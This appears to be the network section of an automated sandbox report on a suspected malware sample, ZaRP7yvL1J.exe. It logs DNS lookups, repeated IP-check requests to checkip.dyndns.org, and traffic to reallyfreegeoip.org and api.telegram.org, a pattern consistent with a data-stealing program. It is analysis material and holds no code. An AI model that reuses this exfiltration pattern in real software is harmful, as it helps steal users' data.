                                                                                                          Jan 11, 2025 07:32:29.166703939 CET44350030149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:29.166794062 CET44350030149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:29.166867018 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:29.167392015 CET50030443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:29.173394918 CET5002980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:29.174402952 CET5003180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:29.178386927 CET8050029193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:29.178432941 CET5002980192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:29.179223061 CET8050031193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:29.179289103 CET5003180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:29.179406881 CET5003180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:29.184104919 CET8050031193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:30.668837070 CET8050031193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:30.670599937 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:30.670710087 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:30.670815945 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:30.671149015 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:30.671164036 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:30.715610981 CET5003180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:31.309509039 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:31.356206894 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:33.255340099 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:33.255420923 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.255486965 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:33.255506992 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.677009106 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.677084923 CET44350032149.154.167.220192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.677238941 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:33.677661896 CET50032443192.168.2.4149.154.167.220
                                                                                                          Jan 11, 2025 07:32:33.679944038 CET5003180192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:33.680788040 CET5003380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:33.685666084 CET8050033193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.685774088 CET5003380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:33.685843945 CET5003380192.168.2.4193.122.6.168
                                                                                                          Jan 11, 2025 07:32:33.689273119 CET8050031193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.690742016 CET8050033193.122.6.168192.168.2.4
                                                                                                          Jan 11, 2025 07:32:33.690804958 CET5003180192.168.2.4193.122.6.168
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 11, 2025 07:31:45.357455969 CET5483853192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 07:31:45.364461899 CET53548381.1.1.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.481794119 CET6108453192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 07:31:46.488658905 CET53610841.1.1.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.704898119 CET6446753192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET53644671.1.1.1192.168.2.4
                                                                                                          Jan 11, 2025 07:31:53.389915943 CET6175653192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET53617561.1.1.1192.168.2.4
                                                                                                          Jan 11, 2025 07:32:02.375968933 CET5456453192.168.2.41.1.1.1
                                                                                                          Jan 11, 2025 07:32:02.383502007 CET53545641.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 11, 2025 07:31:45.357455969 CET192.168.2.41.1.1.10xec00Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:46.481794119 CET192.168.2.41.1.1.10xeaaStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.704898119 CET192.168.2.41.1.1.10x2c9cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.389915943 CET192.168.2.41.1.1.10xa71bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:32:02.375968933 CET192.168.2.41.1.1.10xead6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 11, 2025 07:31:45.364461899 CET1.1.1.1192.168.2.40xec00No error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:46.488658905 CET1.1.1.1192.168.2.40xeaaNo error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET1.1.1.1192.168.2.40x2c9cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET1.1.1.1192.168.2.40x2c9cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET1.1.1.1192.168.2.40x2c9cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET1.1.1.1192.168.2.40x2c9cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET1.1.1.1192.168.2.40x2c9cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:50.712007999 CET1.1.1.1192.168.2.40x2c9cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:31:53.397526979 CET1.1.1.1192.168.2.40xa71bNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 11, 2025 07:32:02.383502007 CET1.1.1.1192.168.2.40xead6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449892193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:31:50.721364021 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:31:52.440203905 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:31:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 11, 2025 07:31:52.449141026 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 07:31:52.636622906 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:31:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 11, 2025 07:32:02.021337986 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 07:32:02.256493092 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:02 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449978193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:03.716248989 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 07:32:04.342973948 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:04 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449991193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:05.447618008 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 07:32:06.082190990 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:05 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.450003193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:07.016571045 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:07.642252922 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:07 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.450012193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:08.535211086 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:10.405659914 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.450017193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:11.394243956 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:12.024065971 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.450019193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:12.930804014 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:15.351646900 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:15 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.450021193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:16.362076998 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:17.080642939 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:16 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.450023193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:17.927453995 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:20.382468939 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:20 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.450025193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:21.226994991 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:23.261779070 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:23 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.450027193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:24.204605103 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:26.059494972 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:25 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.450029193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:27.029798031 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:28.210283995 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.450031193.122.6.168803052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:29.179406881 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 07:32:30.668837070 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:32:30 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
